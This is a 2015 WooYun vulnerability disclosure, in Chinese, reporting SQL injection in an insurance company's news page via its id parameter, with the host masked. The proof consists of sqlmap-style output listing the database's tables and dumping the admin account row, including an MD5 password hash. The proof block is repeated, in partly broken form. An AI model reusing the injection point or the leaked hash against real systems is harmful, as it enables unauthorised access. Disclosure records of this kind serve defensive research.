安诚保险SQL注射一枚（可获取管理员账号密码）

发表于 2015年7月31日
WooYun漏洞库
61 阅读

漏洞概要

缺陷编号：WooYun-2015-0130163

漏洞标题：安诚保险SQL注射一枚（可获取管理员账号密码）

漏洞详情

披露状态：

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认，细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述：

.......

详细说明：

...............

1	...............

漏洞证明：

http://**.**.**.**/news/content1.php?id=769*注：*为注入点available databases [2]:<br>
[*] acic<br>
[*] information_schemaDatabase: acic<br>
[27 tables]<br>
+------------------+<br>
| ac_admin_group   |<br>
| ac_admin_per     |<br>
| ac_admin_user    |<br>
| ac_ads           |<br>
| ac_adstype       |<br>
| ac_article       |<br>
| ac_article_field |<br>
| ac_classtype     |<br>
| ac_comment       |<br>
| ac_custom        |<br>
| ac_fields        |<br>
| ac_funs          |<br>
| ac_labelcus      |<br>
| ac_links         |<br>
| ac_linkstype     |<br>
| ac_member        |<br>
| ac_member_field  |<br>
| ac_member_file   |<br>
| ac_member_group  |<br>
| ac_message       |<br>
| ac_message_field |<br>
| ac_molds         |<br>
| ac_product       |<br>
| ac_product_field |<br>
| ac_special       |<br>
| ac_traits        |<br>
| ac_update        |<br>
+------------------+Table: ac_admin_user<br>
[1 entry]<br>
+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+<br>
| amail              | aname                                | apass                            | atel               | auid | auser | gid | level | pclasstype |<br>
+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+<br>
| \e9\82\ae\e7\ae\b1 | \e7\9c\9f\e5\ae\9e\e5\a7\93\e5\90\8d | 03fc3a31c86ea5a7d92bd45f3319e1c9 | \e7\94\b5\e8\af\9d | 1    | admin | 1   | 1     | None       |<br>
+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+

http://**.**.**.**/news/content1.php?id=769*注：*为注入点available databases [2]:

[*] acic

[*] information_schemaDatabase: acic

[27 tables]

+------------------+

| ac_admin_group |

| ac_admin_per |

| ac_admin_user |

| ac_ads |

| ac_adstype |

| ac_article |

| ac_article_field |

| ac_classtype |

| ac_comment |

| ac_custom |

| ac_fields |

| ac_funs |

| ac_labelcus |

| ac_links |

| ac_linkstype |

| ac_member |

| ac_member_field |

| ac_member_file |

| ac_member_group |

| ac_message |

| ac_message_field |

| ac_molds |

| ac_product |

| ac_product_field |

| ac_special |

| ac_traits |

| ac_update |

+------------------+Table: ac_admin_user

[1 entry]

+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+

+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+

+--------------------+--------------------------------------+----------------------------------+--------------------+------+-------+-----+-------+------------+